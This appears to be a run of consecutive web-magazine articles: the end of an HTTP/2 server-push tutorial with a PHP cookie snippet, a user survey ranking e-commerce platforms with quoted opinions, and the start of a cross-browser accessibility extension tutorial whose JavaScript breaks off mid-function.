Some servers give you a lot of server push-related configuration options. Apache’s mod_http2 has some options for configuring how assets are pushed. The H2PushPriority setting should be of particular interest, although in the case of my server, I left it at the default setting. Some experimentation could yield additional performance benefits. Every web server has a whole different set of switches and dials for you to experiment with, so read the manual for yours and find out what’s available!
There has been some gnashing of teeth over whether server push could hurt performance in that returning visitors may have assets needlessly pushed to them again. Some servers do their best to mitigate this. Apache’s mod_http2 uses the H2PushDiarySize setting to optimize this somewhat. H2O Server has a feature called cache-aware server push that uses a cookie mechanism to remember pushed assets.
If you don’t use H2O Server, you can achieve the same thing on your web server or in server-side code by only pushing assets in the absence of a cookie. If you’re interested in learning how to do this, then check out a post I wrote about it on CSS-Tricks. It’s also worth mentioning that browsers can send an RST_STREAM frame to signal to a server that a pushed asset is not needed. As time goes on, this scenario will be handled much more gracefully.
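A minimal sketch of that cookie-based technique in PHP (the cookie name and asset path are illustrative assumptions, not taken from the article):

```php
<?php
// Push only for visitors who don't carry our marker cookie; returning
// visitors will most likely have the asset in their browser cache already.
if (!isset($_COOKIE["h2pushed"])) {
    header("Link: </css/styles.css>; rel=preload; as=style");
    // Set the marker cookie for a week so we don't push again on the next visit.
    setcookie("h2pushed", "1", time() + 604800, "/");
}
```

Like header(), setcookie() must run before any of the response body has been sent.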
As sad as it may seem, we’re nearing the end of our time together. Let’s wrap things up and talk a bit about what we’ve learned.
If you’ve already migrated your website to HTTP/2, you have little reason not to use server push. If you have a highly complex website with many assets, start small. A good rule of thumb is to consider pushing anything that you were once comfortable inlining. A good starting point is to push your site’s CSS. If you’re feeling more adventurous after that, then consider pushing other stuff. Always test changes to see how they affect performance. You’ll likely realize some benefit from this feature if you tinker with it enough.
If you’re not using a cache-aware server push mechanism like H2O Server’s, consider tracking your users with a cookie and only pushing assets to them in the absence of that cookie. This will minimize unnecessary pushes to known users, while improving performance for unknown users. This not only is good for performance, but also shows respect to your users with restricted data plans.
All that’s left for you now is to try out server push for yourself. So get out there and see what this feature can do for you and your users! If you want to know more about server push, check out the following resources:
Thanks to Yoav Weiss for clarifying that the as attribute is required (and not optional as the original article stated), as well as a couple of other minor technical issues. Additional thanks goes to Jake Archibald for pointing out that the preload resource hint is an optimization distinct from server push.
This article is about an HTTP/2 feature named server push. This and many other topics are covered in Jeremy’s book Web Performance in Action. You can get it or any other Manning Publications book for 42% off with the coupon code sswagner!
Did you know that bandwidth overage charges are (still) a problem and most users prefer not to rely on a developer? Well, I talked to 917 (real-life) users and created a guide to help others find the e-commerce software that suits them best.
I completed this guide by searching for websites built with e-commerce software (you can verify by looking at the source code — certain code strings are unique to the software). Once I found a website, I (or one of my virtual assistants) would email the owner and ask if they’d recommend a particular software. Typically, they’d reply and I’d record their response in a spreadsheet (and personally thank them). Occasionally, I would even go on the phone to speak with them directly (although I quickly found out that this took too much time).
Here’s what I discovered.
I calculated customer satisfaction by finding the percentage of active users who recommend the software:
| E-commerce software | Recommendation % |
|---|---|
| Shopify | 98% |
| Squarespace | 94% |
| Big Cartel | 91% |
| WooCommerce | 90% |
| OpenCart | 88% |
| Jumpseller | 86% |
| GoDaddy | 83% |
| CoreCommerce | 80% |
| BigCommerce | 79% |
| Ubercart | 78% |
| Wix | 76% |
| Magento | 74% |
| Weebly | 74% |
| 3dcart | 72% |
| PrestaShop | 70% |
| Goodsie | 65% |
| Spark Pay | 65% |
| Volusion | 51% |
Shopify is the pretty clear winner, with Squarespace close behind — but both companies are actually complementary. Shopify is a complete, robust solution that works for both small and large stores, while Squarespace is a simple, approachable platform that works well for stores just starting out. (Worth noting: I’ve done similar surveys for portfolio builders5 and landing-page builders6, and Shopify is the only company I’ve seen score higher than 95% in customer satisfaction.)
But looking only at customer satisfaction is not enough. After all, e-commerce platforms have different strengths. So, I also asked users what they like and dislike about their software and found some important insights about each company.
App store and features
“The best thing is that you don’t need a developer to add features… there’s a ton of apps available.” | “Their partner ecosystem is best.” | “Shopify has any feature under the sun — if you think you need it, someone already created an app.” | “Access to Shopify Apps is great.” | “There’s heaps of third-party apps you can integrate easily that I believe are essential to growing a business.” | “So many third-party apps, templates that other platforms aren’t popular enough to have.” | “There are many apps that can help with customization issues.” | “There are a ton of great third-party apps for extended functionality.”
Ease of use
“Easy to set up without having specific skills.” | “Intuitive user interface.” | “Simple to use.” | “It is very easy to start selling online.” | “Easy UI, pretty intuitive.” | “The interface is excellent for managing e-commerce.” | “It’s really clean and easy to manage.” | “Shopify provides a very straightforward way to add products, edit options and to apply different themes.” | “More than anything, very simple.” | “It’s simple and intuitive.” | “Very user-friendly.” | “Super user-friendly for non-computer guys like myself.” | “The back end is exceptional.”
Ease of use
“It’s very easy to use.” | “The e-commerce is so easy to use.” | “It’s easy to configure, simple to add, delete and modify our inventory, and most importantly it allows us to easily keep track of our ins and outs with helpful metrics and sales graphs.” | “It’s very easy to set up.” | “The user interface is easy to use.” | “Commerce is really nice and easy to set up.” | “Love the interface, very easy to work with.” | “I find it easy to use.” | “It was pretty easy to set up and has been a snap to maintain.” | “It’s all pretty smooth and easy.” | “It’s super-easy.” | “I’ve tried Drupal, WordPress… the interface and creative ability of Squarespace is much superior.”
Templates
“Has some great templates for a good-looking website.” | “Squarespace is an easy way to get a great looking site.” | “The sites are beautiful.” | “The templates and editing features on the blog and site are super-easy.” | “The thing I like most are the beautiful and easy templates.”
Limitations
“The only thing I would say they need to improve is allowing more than one currency on the e-commerce site, which currently is not available.” | “It works pretty good for basic sales of items.” | “There are some limitations in terms of customizing, but they are minor.” | “If you are using it as is and just need the limited feature set that it comes with, it’s a great option.” | “Overall, it’s great for putting a few simple products up, but if you need anything beyond their default cart options, get a proper Squarespace developer or someone to set up a Shopify site for you.” | “It is really a great place to start, but unfortunately a place that is easily transitioned out of once the business begins to grow.”
Shipping
“My partners have had some concerns with the shipping aspect, though.” | “Yes, I would recommend it, but Squarespace needs to have calculated shipping for all the plans.” | “The shipping is still something I wish was a little easier.” | “The only thing I would say is that, for me, the shipping options are more limited than I would like.” | “There are some features I wish were better implemented in the base package (like shipping integration for international orders), but I’d recommend it.”
Good for new stores
“I would recommend Big Cartel for smaller shops.” | “I would recommend it, especially startup users.” | “It’s a great place to start out!” | “We’d recommend it for similar businesses, especially those just getting started.” | “It is a great platform for something really simple and was very easy to set up.” | “Big Cartel is great for beginning stages of a store. We’re actually entertaining moving to a new platform right now.” | “It’s quite good for a small company or startup, for sure.” | “I’m finding that in the early stages of the business, it’s extremely handy for stock listing and very straightforward to use.”
Ease of use
“It’s very easy to use.” | “It’s very easy to use, navigate and customize the shopfront.” | “I am particularly fond of the back end and the admin tools. They make maintaining and shipping products a breeze.” | “It’s super-simple and really user-friendly.” | “I’m not savvy, so it works well for my skill level.” | “Easy to set up… and easy to control and set inventory.” | “They make it so easy to have a beautiful website.” | “For just a few items, Big Cartel totally gets the job done and is user-friendly.”
Price
“I only have to pay $9.99 a month for Big Cartel. That’s a huge perk for me.” | “Low price point and easy to use.” | “The rates are the lowest considering all the things you’re able to do.” | “I have found the cost is a lot better than my Etsy store.” | “You get a great platform for a great price.” | “Compared to Etsy, the fees are ridiculously cheap!” | “One fee a month, no item fees per listing… There is an option to open a store for free with five listings. This is an amazing feature.” | “Their prices are also very reasonable.”
Limitations
“Lacking in features.” | “It is limited in terms of themes… You always know when you’re on a Big Cartel site.” | “It does most of what I expect of it, but also has limitations.” | “The one problem I have is that the only options for receiving payments are PayPal and Stripe.” | “If you want more of an interactive site with blogs and videos and whatnot, I think there are better options out there.” | “We are currently moving over to Shopify because we have maxed out Big Cartel’s limited 300-item store capacity. That is the only downside of Big Cartel.” | “You are limited by what Big Cartel allows you to do. For example, there are certain promotions that I would like to do, but currently Big Cartel has no way of allowing it.”
Extensions
“Many useful plugins for it.” | “So many features.” | “There are plenty of add-ons with it to customize shop as we need.” | “Fully customizable.” | “The plugin architecture is great.” | “It also has a lot of plugins.” | “It’s very good if you are looking for something that can do anything… there are extensions available, and coders who can write plugins.” | “I’m a fan of the plugins because it allows for a lot of customization.”
Ecosystem
“The ecosystem is well supported.” | “Great support with a whole online community dedicated to it.” | “I’m always able to find the answer to any question I have, either through the official WooCommerce knowledge base or in the community forums.”
Developer may be required
“Custom modifications do require somewhat advanced developer knowledge.” | “WooCommerce does require knowledge in website building… At one point, it became extremely slow, and I couldn’t figure out where the problem was.” | “What should be native often requires plugins or coding.” | “Very customizable with some code editing.” | “WooCommerce definitely requires a solid knowledge of the inner workings.” | “There definitely is a learning curve, but it is not too hard to master.” | “It had to be highly customized for us by our website developers.”
Extensions
“There are plenty of extensions (free and for purchase).” | “Tons of extensions to make it really awesome.” | “OpenCart extensions… have been very valuable and reliable.” | “Customization does need IT capabilities, though.” | “The software is only as good as its implementers.”
Often requires a developer
“It took some PHP programming to get it completely as we wish, but now it works fine and suits my goals well.” | “If you do not have someone capable of working behind the scenes, it would be difficult to manage.” | “I’d recommend it if and only if you have at least some knowledge web programming (PHP, JavaScript, XML, MySQL, etc.).” | “Not recommended for anyone without some web programming knowledge.” | “With the right technical staff, yes I would.” | “If you would be a serious user, I can recommend OpenCart, but also I would recommend hiring a developer to make all custom improvements.” | “Yes, I would recommend it as a good platform with cheap extensions.” | “There is also a large amount of high-quality extensions.” | “Tons of plugins, both free to paid.”
Extensions can create bugs
“When you modify it, it does amazing things but is super-finicky.” | “Buying and installing extensions is a bad idea… It’s not a plug-and-play procedure.” | “As we grew bigger, there have been headaches, mostly to do with third-party extensions clashing with each other.”
Customer support
“The Jumpseller team is also very helpful… They’ll walk you through the process of making website [changes], so you can really understand.” | “Technical support is great, always helpful and fast.” | “The best thing is its excellent service, very fast and efficient.” | “Support has worked well so far. When we’ve submitted a query, we’ve gotten quick feedback.” | “Fast and good email support.” | “The customer service is very responsive and helpful.” | “The email response time is super-fast. If I have one question or doubt regarding anything, from design to DNS configuration, they’ll reply in less than 15 minutes!”
Using it for Chilean and international stores
“Our store is based in Chile, and another feature we appreciated is that it had full integration with local payment systems.” | “Has local credit-card options (in our country).” | “Recently, they integrated the price list of one of the shipping companies most used in our country.” | “The good thing is the translation tool.” | “I can tell you that we have selected Jumpseller because we are selling in Chile, and the store was very well integrated with the most popular payment methods, couriers, etc.”
Ease of use
“It is easy to set up.” | “Easy to maintain.” | “Fairly user-friendly.” | “They really made everything so simple to make extremely intuitive changes quickly.” | “It’s easy to work with.” | “I would recommend it for a new user because of the ease of use in building a store.” | “Easy to use and have had no issues.”
Limitations
“There are design limitations, though.” | “It is lacking in several business customization respects.” | “I wish there was a little more customization allowed.” | “There are some design limitations unless you know HTML.” | “Product is good but has many limitations.” | “I like it, but it does have limitations.” | “It has some limitations, but I have been able to work around them.” | “It does have its limitations on customizing, though.”
Credit-card processor options
“It would be better if it allowed shoppers to use a credit card to place an order, even if we don’t use their approved credit-card processor.” | “We were happy with them for years, and then out of the blue, the payment processors affiliated with GoDaddy dropped us.” | “We will be switching all of our stores from GoDaddy in the near future because it does not allow you to use the merchant service of your choice. You are forced to use Stripe.”
Support
“Tech support has always been responsive and friendly.” | “Good customer support.” | “I have been able to live chat or call with questions without issue.” | “The support is excellent.” | “Very quick responses to any of our requests.” | “Their support is very good.” | “Their customer service is absolutely the very best.” | “You can always call them 24/7 if you need any kind of support, and it doesn’t cost any extra money.” | “Their tech support is awesome.” | “CoreCommerce’s service is good. It has a mom and pop feel to it.”
Price
“Price for the features and benefits given is exceptional, and no one we’ve spoken with can come close to the value.” | “It is a very cost-effective solution.” | “It is also very affordable.” | “I have yet to find another platform that offers the same value as CoreCommerce (at least for our particular business).” | “Prices are good.”
Feels outdated
“Technologies are old, and they are very slow to update it.” | “It feels like the year 2003.” | “Outdated and uninspiring admin panel.” | “They’ve been a bit behind the times with integrations (still no Bitcoin, for example).” | “They are using an antiquated system, which doesn’t bode well for tie-in structures for the future.”
Difficult to use
“I do find the GUI to be somewhat frustrating and unintuitive.” | “It is annoying when you [have] to update each thing in multiple areas.” | “It is not intuitive or user-friendly.” | “The product was flaky. Flexible but badly designed in lots of areas.” | “Control panel sucks.”
Customer support
“I emailed the president [of BigCommerce] at 1:00 am requesting help… Within 10 minutes, [he] was on it with compassion and ready to help. They have bent over backward for me.” | “They provide excellent customer support.” | “If nothing else, they seem to have great customer service.” | “More than anything, we care about customer service, and BigCommerce provides excellent customer service.” | “Technical support has been great.” | “Great support.” | “Their tech support is 24/7 and is very responsive to our questions.” | “Customer service… is very helpful.”
Price
“Their pricing structure is punitive for successful businesses… This is surely a recurring theme if you’ve reached out to many B2C website users who have grown their site.” | “A bit pricey when your sales hit over $300,000 a year.” | “[Recently,] my monthly payments increased from $25 to $250 due to my business exceeding the annual sales of their intermediate plan.” | “Because of our sales volume, BigCommerce frequently increases our monthly fees based on increasing sales. This has become very expensive.” | “A bit pricey.” | “We feel it is overpriced these days.” | “Their pricing structure makes no sense, but I’ve been with them for seven years.” | “I would recommend BigCommerce. Pricing is a bit high, though.” | “I personally think the pricing is a little steep.”
Not for non-developers
“Not as friendly for a non-developer or an individual who just wants to set up shop on their own and doesn’t have a technical background.” | “Ubercart works well as long as you have an experienced programmer.” | “Please note that it would require a developer who knows Drupal, because many aspects needed customization.” | “[I would recommend it ] if you’re comfortable with Drupal.”
Difficult to use
“Ubercart is OK, but it is hard to customize.” | “The learning curve is quite steep.” | “It can be a bit tricky to get your store looking just the way you want.” | “Ubercart isn’t the easiest to set up or work with.” | “The only disadvantage of Ubercart is the complex configuration of the store system.” | “It’s not as plug-and-play as Shopify.”
Ease of use
“The e-commerce site is beyond simple to use.” | “I would recommend it on one level: It’s easy to use. I can do all the building and updating myself, and so that’s good.” | “Easy to use.” | “Easy to build and maintain.” | “It is user-friendly, easy to set up and modify.” | “It’s super-easy to use, and it seems like everyone who’s ordered from me has also done so with ease.” | “If you want a simple storefront, it’s pretty straightforward, easy and cheap.” | “It is easy to set up.” | “It’s easy to use and user-friendly.” | “It was pretty intuitive to set up.”
Limitations
“It is basic.” | “There are some limitations with shipping and accounting (sending to QuickBooks, etc.).” | “A little limited in some options.” | “I have not been able to make it work in the way I need.” | “I cannot update the inventory amount.” | “We had so many different options, which the configuration of the store and products did not allow us to do.” | “We also wanted to be able to get customers reviews and could not do it.” | “My main complaint is the lack of customization options — for example, not being able to display a price per pound.” | “If you want a variety of options and a wide range of modifications, it is not ideal.”
Highly customizable
“We have complete control over our Magento store and have customized it extensively to meet our needs. That’s what I like most about it.” | “The amount of customizations and extensions available are endless.” | “It has an unparalleled level of customization and freedom.” | “It has a lot of great customization features.” | “It’s pretty powerful.”
Difficult to use
“Probably the steepest learning curve.” | “It’s very expensive to get changes made.” | “Magento is overkill for what I need to do on my site.” | “User interface is not as easy as it could be.” | “It can be a real pain sometimes.” | “Complicated to set up.” | “It’s got a steep learning curve.” | “Magento has a huge learning curve.” | “It breaks for no reasons, and it breaks if you add anything to the site.” | “Always something going wrong for no apparent reason.”
Often requires professional help
“You will need a good PHP programmer if you intend to add anything to it beyond the default installation.” | “If one wants to really change Magento, one needs an expert.” | “Needs a good specialist to partner with to get the best out of it.” | “I would recommend it as long as you have a true Magento-certified developer to hold your hand the entire way and to create your site and work with you.” | “Magento is good if you’re a web developer and have coding skills.”
Ease of use
“It is very easy to use.” | “It was easy to use without web design experience.” | “It is basic and easy to use.” | “I have enjoyed the ease of Weebly and what you can accomplish with the tools.” | “It is extremely easy for me to use.” | “I’d recommend it because it is so easy to set up and track inventory.” | “This is one of the easiest [e-commerce platforms] I have used.” | “I do like the online store with Weebly because of the ease of use.” | “Weebly is really easy to use.”
Third-party hosts
“[Weebly] is offered through MacHighway, which I use for my hosting, so there were some glitches in the beginning that probably wouldn’t have been there if I’d gone straight through Weebly.” | “Just make sure you buy the Weebly subscription directly through weebly.com and not through a reseller, because I lost a whole website that way.” | “I would recommend it but only through the Weebly host.” | “The B.S. part is that since day one, iPower (a third-party Weebly host) claimed I was getting an ultra-premium package but was only paying for basic. I would go to edit a product and nothing worked. I’d call customer support and they’d tell me I need to upgrade. This has happened to me twice in three years with them. I’m hoping they get stuck with a class-action suit for fraud.” | “iPage is my host for Weebly. Because of this, I don’t have access to all of the features Weebly offers.” | “… Full access to all of the Weebly features would sort that at once, but iPage (maybe I should change) wants to lock me in for three years and pay the full amount up front!”
Limited features
“If you want a more customizable tool, then this might not work for you.” | “Weebly is missing some of the critical things that we want from an online store.” | “I am hoping that they have, or will come up with, an automatic shipping calculation.” | “The only hiccup is when I need to change my prices. I have a lot of inventory, and I have found that the easiest way (relatively speaking) to do this is to change each one individually.” | “You can’t do everything design-wise on it.” | “It was perfect for me at first, but I have grown out of it very quickly [because of limited features].” | “The Weebly platform is not scalable. There is no element to customize your cart.” | “The shipping is a problem because it can’t be adjusted for lighter, heavier or multiple items.”
Bandwidth overage charges
“If you read the forums, one problem that continually arises, and one that I have, is bandwidth. It seems that I’m always going over my bandwidth, even though I have relatively few products and dump files regularly.” | “3dcart charges for bandwidth, so serving lots of digital products from your server might not be a great idea depending on your budget.” | “They charge you for data, and it adds up.” | “It tends to use a lot of bandwidth. My store doesn’t have a huge amount of traffic (yet!), but I still go over my plan just about every month.”
Customer support
“Their comments are snarky, and their help is judgemental in that they always place blame on the customer, and it can take up to a week for them to solve a problem.” | “Customer support has a laissez-faire attitude.” | “I have to really keep on them when I open a ticket, or I may not get a response for days.” | “I would say the biggest con has been customer service.” | “I would characterize them as almost disrespectful.” | “Their lack of support [was surprising].” | “The tech support also cannot help with even the most basic HTML questions.” | “Technical support online isn’t the best.” | “The help line is not very helpful. If there is a problem, such as the system stops taking orders or accepting credit cards, they assume it’s a problem on your end.” | “Their live support sucks.”
Difficult to use
“I feel the product is terribly cumbersome.” | “The admin interface makes it very difficult to find what settings I’m looking for.” | “It is awkward and not very user-friendly.” | “My website is with 3dcart, but it is overwhelming.” | “It is a little quirky in the back end.” | “I personally find it difficult to make even simple changes to.” | “Some of it is not very intuitive, so you have to keep clicking around until you remember where everything is.”
Modules
“It has quite a lot of modules.” | “It has loads of modules.” | “Lots of additional modules and functionalities to add.” | “A lot of modules.” | “They have a lot of free and already installed modules.” | “There are a lot of free modules.” | “Large offer of modules.”
Difficult to use
“You need to be quite a good geek to understand everything.” | “We’ve encountered and still are encountering lots of problems with PrestaShop.” | “PrestaShop isn’t as user-friendly as others are nowadays.” | “The admin panel is not user-friendly.” | “I don’t recommend it for a beginner or if you don’t have much technical skill.”
Buggy
“I hate it… It’s buggy and impossible to upgrade easily to newer versions.” | “It’s kind of an unstable, slow system for me, but I think in the near future it will be more stable and fast.” | “We have lots of problems with PrestaShop.” | “No, I would not recommend it. Buggy as hell.” | “No, I would not recommend it. Too heavy and too slow.” | “The back-end pages sometimes take an age to load — even for simple stuff.”
Good for beginners
“Quick and easy. I think its simplicity best suits the light or new user.” | “Great for people with no knowledge [of how to build a store].” | “For someone with zero experience building a website, I found their product to be so easy to navigate.” | “I highly recommend it for beginners.”
Pricing
“Way too expensive.” | “There are cheaper options out there that do the same thing.” | “I liked Goodsie when I started with them five or six years ago, but their prices keep going up.” | “Prices were hiked above what they should be, so I am about to change.” | “The price went from $15 to $30 per month not too long ago.”
Customer support is prompt
“Whenever we’ve needed support, their help systems are very responsive.” | “Spark Pay’s technical support is excellent.” | “Very responsive for help.” | “They have been responsive to any needs I’ve had.” | “I find their customer service to be quite responsive.” | “Tech support is very responsive via phone or email.” | “They have been very responsive to helping out with general website questions and problems.”
Bandwidth overage charges
“The main thing I don’t like are the extra bandwidth charges.” | “Nailed with huge bandwidth charges.” | “There are little hidden fees for going over your bandwidth, account file storage and product count if you don’t keep an eye on them.”
Difficult to use
“Spark Pay is not simple!” | “They have a ton of features built in — most of them are half-baked and don’t function 100%, which has led to frustration.” | “[Needs to] reduce the bloat in their software.” | “Unless you have a designer and/or developer on staff, or at the very least a very computer-savvy non-techie, it’s virtually impossible to understand Spark Pay.” | “Their web editor is clumsy.” | “Their platform is buggy.” | “It is crazy complicated to make even some of the most mundane changes.” | “Their system bogs down so much that only the most minor of changes are doable.” | “Clunky UI, way too much complexity. Just a nightmare to deal with.”
While prompt, customer support can be disappointing
“Their service desk really isn’t one. They have no formal (or competent) escalation process.” | “They are not nearly as responsive to fixing significant issues as they should be.” | “I feel like the platform has a lot of tools to offer, but few resources to teach you how to use them.” | “Technical support is rather lacking. When you do finally get someone to answer the tickets, they do a very minimal amount of work and effort to correct the problem.”
Customer support
“Their technical support department people are top-notch… I’m extremely impressed with them.” | “The [support] team at Volusion is knowledgeable, and that is highly important.” | “Their customer support is excellent.” | “Their support is superb.” | “Support is second to none.” | “Their technical support team is also very good in helping to fix any issues that we might have had.”
Bandwidth limitations
“The one thing I can’t stand is the amount of bandwidth they provide you with. [It] will easily be gone in a week if you have a lot of visitors.” | “They don’t have adequate bandwidth plans, and their billing for bandwidth overages is highly irritating.” | “Site traffic is pricey.” | “I originally used very large images for my products and received some rather stiff hosting fines for going over the stupidly low bandwidth level.” | “The way they charge for bandwidth caused us to have obscene overage charged for months.”
Expensive
“It is particularly expensive, and the costs weren’t clear [when we started].” | “Once the site is built, they nickel and dime you for every little thing imaginable.” | “I also used the Volusion SEO team and that was a joke. $1600 a month!” | “Not the least expensive around.” | “I would caution new users to be aware of hidden costs. Email addresses are extra. An SSL certificate is extra. A service to check the reliability of each credit card is extra. SEO and design services are phenomenally expensive.” | “Going by the prices they charge for SEO packages, they’re aiming at companies far larger than mine.” | “If you want anything besides barebone offerings, everything else is available… for a price.” | “I just wish it was a little cheaper.” | “Volusion keeps [the initial setup and customization] complicated, hoping that you will pay them to do it for you.”
Difficult to use
“The back end is not user-friendly.” | “The UX is confusing and bloated, but I’m used to it.” | “There is a learning curve, so it takes a while to get going. And if you want customization, be prepared to learn it yourself or pay some hefty fees.” | “It’s not straightforward and is prone to errors.” | “If you change a font size within the text, you then lose all other formatting — nothing major, but annoying and time-consuming.” | “It’s quite clunky to manage content and design.” | “There are random glitches throughout the site that have probably cost me thousands in abandoned carts.” | “One thing that is hard for me is manipulating website elements. GoDaddy was easier for me.”
It’s worth noting that this is not a list of all e-commerce software currently available in the world. Instead, I’ve only included software for which I was able to talk to a minimum of 30 users (and I was not able to find 30 users for several companies).
But this is a fairly comprehensive list of the most popular e-commerce platforms. Furthermore, these are the thoughts of real, verified users. I hope it’s helpful in your search for the right e-commerce software!
This article is based on the e-commerce software guide originally published here43.
(vf, al, il)
In today’s article, we’ll create a JavaScript extension that works in all major modern browsers, using the very same code base. Indeed, the Chrome extension model based on HTML, CSS and JavaScript is now available almost everywhere, and there is even a Browser Extension Community Group1 working on a standard.
I’ll explain how to install this extension in the browsers that support the web extension model (i.e. Edge, Chrome, Firefox, Opera, Brave and Vivaldi), share some simple tips on how to keep a single code base for all of them, and show how to debug in each browser.
Note: We won’t cover Safari in this article because it doesn’t support the same extension model2 as others.
I won’t cover the basics of extension development because plenty of good resources are already available from each vendor:
So, if you’ve never built an extension before or don’t know how it works, have a quick look at those resources. Don’t worry: Building one is simple and straightforward.
Let’s build a proof of concept — an extension that uses artificial intelligence (AI) and computer vision to help the blind analyze images on a web page.
We’ll see that, with a few lines of code, we can create some powerful features in the browser. In my case, I’m concerned with accessibility on the web and I’ve already spent some time thinking about how to make a breakout game accessible using web audio and SVG14, for instance.
Still, I’ve been looking for something that would help blind people in a more general way. I was recently inspired while listening to a great talk by Chris Heilmann15 in Lisbon: “Pixels and Hidden Meaning in Pixels16.”
Indeed, using today’s AI algorithms in the cloud, as well as text-to-speech technologies, exposed in the browser with the Web Speech API17 or using a remote cloud service, we can very easily build an extension that analyzes web page images with missing or improperly filled alt text properties.
My little proof of concept simply extracts images from a web page (the one in the active tab) and displays the thumbnails in a list. When you click on one of the images, the extension queries the Computer Vision API to get some descriptive text for the image and then uses either the Web Speech API or Bing Speech API to share it with the visitor.
The video below demonstrates it in Edge, Chrome, Firefox, Opera and Brave.
You’ll notice that, even when the Computer Vision API is analyzing some CGI images, it’s very accurate! I’m really impressed by the progress the industry has made on this in recent months.
I’m using these services:
Update the TODO section in the code with your key to make this extension work on your machine. To get an idea of what this API can do, play around with it20. But feel free to try other similar services:
You can find the code for this small browser extension on my GitHub page27. Feel free to modify the code for other products you want to test.
Most of the code and tutorials you’ll find use the namespace chrome.xxx for the Extension API (chrome.tabs, for instance).
But, as I’ve said, the Extension API model is currently being standardized to browser.xxx, and some browsers are defining their own namespaces in the meantime (for example, Edge is using msBrowser).
Fortunately, most of the API remains the same regardless of the namespace. So, thanks to the flexibility of JavaScript, it’s very simple to create a little shim that supports all browsers and namespace definitions:
window.browser = (function () {
  return window.msBrowser || window.browser || window.chrome;
})();
And voilà!
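To make the precedence explicit, here is the same fallback rewritten as a small, testable sketch. The mock object is mine; a real extension would pass the actual window object:

```javascript
// Sketch of the shim above, written as a function so the precedence
// (msBrowser, then browser, then chrome) is easy to see and to test.
// The "win" parameter stands in for the real window object.
function resolveExtensionNamespace(win) {
  return win.msBrowser || win.browser || win.chrome;
}

// Mocked environment: Chrome, Opera, Brave and Vivaldi expose only window.chrome.
var chromeLike = { chrome: { tabs: {} } };
console.log(resolveExtensionNamespace(chromeLike) === chromeLike.chrome); // true
```

With an Edge-like mock (`{ msBrowser: … }`) or a Firefox-like one (`{ browser: … }`), the first defined namespace wins, which is exactly what the one-liner in the article relies on.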
Of course, you’ll also need to restrict yourself to the subset of the API supported by all browsers.
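One pragmatic way to stay inside that common subset is to feature-detect before calling anything you are unsure about. The helper below is my own hypothetical sketch, not part of the article’s code:

```javascript
// Hypothetical guard: check that a method exists on a namespace before
// relying on it, since each browser implements a slightly different
// subset of the extension API.
function supportsMethod(namespace, methodName) {
  return !!(namespace && typeof namespace[methodName] === "function");
}

// Mock of a partial extension API exposing only tabs.query:
var fakeApi = { tabs: { query: function () {} } };
console.log(supportsMethod(fakeApi.tabs, "query"));   // true
console.log(supportsMethod(fakeApi.tabs, "discard")); // false
```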
Let’s review together the architecture of this extension. If you’re new to browser extensions, this should help you to understand the flow.
Let’s start with the manifest file31:
This manifest file and its associated JSON properties are the minimum you’ll need to load an extension in all browsers (not considering the code of the extension itself, of course). Please check the source34 in my GitHub account, and start from it to be sure that your extension is compatible with all browsers.
For instance, you must specify an author property to load it in Edge; otherwise, it will throw an error. You’ll also need to use the same structure for the icons. The default_title property is also important because it’s used by screen readers in some browsers.
Here are links to the documentation to help you build a manifest file that is compatible everywhere:
The sample extension used in this article is mainly based on the concept of the content script38. This is a script living in the context of the page that we’d like to inspect. Because it has access to the DOM, it will help us to retrieve the images contained in the web page. If you’d like to know more about what a content script is, Opera39, Mozilla40 and Google41 have documentation on it.
Our content script42 is simple:
console.log("Dare Angel content script started");
browser.runtime.onMessage.addListener(function (request, sender, sendResponse) {
    if (request.command == "requestImages") {
        var images = document.getElementsByTagName('img');
        var imagesList = [];
        for (var i = 0; i < images.length; i++) {
            if (images[i].width > 64 && images[i].height > 64) {
                imagesList.push({ url: images[i].src, alt: images[i].alt });
            }
        }
        sendResponse(JSON.stringify(imagesList));
    }
});
This first logs into the console to let you check that the extension has properly loaded. Check it via your browser’s developer tool, accessible from F12, Control + Shift + I or ⌘ + ⌥ + I.
It then waits for a message from the UI page with a requestImages command to get all of the images available in the current DOM, and then it returns a list of their URLs if they’re bigger than 64 × 64 pixels (to avoid all of the pixel-tracking junk and low-resolution images).
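That size-filtering rule can be sketched as a standalone function. This is a hypothetical rewrite of the loop, using plain objects in place of DOM img elements so it runs anywhere:

```javascript
// Hypothetical standalone version of the filtering rule described above:
// keep only images bigger than 64 × 64 pixels and return url/alt pairs.
// Plain objects stand in for DOM <img> elements.
function collectLargeImages(images) {
  var imagesList = [];
  for (var i = 0; i < images.length; i++) {
    if (images[i].width > 64 && images[i].height > 64) {
      imagesList.push({ url: images[i].src, alt: images[i].alt });
    }
  }
  return imagesList;
}

var mockImages = [
  { src: "pixel.gif", alt: "", width: 1, height: 1 },           // tracking pixel: skipped
  { src: "photo.jpg", alt: "a photo", width: 200, height: 150 } // kept
];
console.log(collectLargeImages(mockImages).length); // 1
```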
The popup UI page47 we’re using is very simple and will display the list of images returned by the content script inside a flexbox container48. It loads the start.js script, which immediately creates an instance of dareangel.dashboard.js49 to send a message to the content script to get the URLs of the images in the currently visible tab.
Here’s the code that lives in the UI page, requesting the URLs to the content script:
browser.tabs.query({ active: true, currentWindow: true }, (tabs) => {
    browser.tabs.sendMessage(tabs[0].id, { command: "requestImages" }, (response) => {
        this._imagesList = JSON.parse(response);
        this._imagesList.forEach((element) => {
            var newImageHTMLElement = document.createElement("img");
            newImageHTMLElement.src = element.url;
            newImageHTMLElement.alt = element.alt;
            newImageHTMLElement.tabIndex = this._tabIndex;
            this._tabIndex++;
            newImageHTMLElement.addEventListener("focus", (event) => {
                if (COMPUTERVISIONKEY !== "") {
                    this.analyzeThisImage(event.target.src);
                }
                else {
                    var warningMsg = document.createElement("div");
                    warningMsg.innerHTML = "Please generate a Computer Vision key in the other tab.";
                    this._targetDiv.insertBefore(warningMsg, this._targetDiv.firstChild);
                    browser.tabs.create({
                        active: false,
                        url: "https://www.microsoft.com/cognitive-services/en-US/sign-up?ReturnUrl=/cognitive-services/en-us/subscriptions?productId=%2fproducts%2f54d873dd5eefd00dc474a0f4"
                    });
                }
            });
            this._targetDiv.appendChild(newImageHTMLElement);
        });
    });
});
We’re creating image elements. Each image will trigger an event when it receives focus, querying the Computer Vision API for a description.
This is done by this simple XHR call:
analyzeThisImage(url) {
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = () => {
        if (xhr.readyState == 4 && xhr.status == 200) {
            var parsedResponse = JSON.parse(xhr.response);
            var resultToSpeak = `With a confidence of ${Math.round(parsedResponse.description.captions[0].confidence * 100)}%, I think it's ${parsedResponse.description.captions[0].text}`;
            console.log(resultToSpeak);
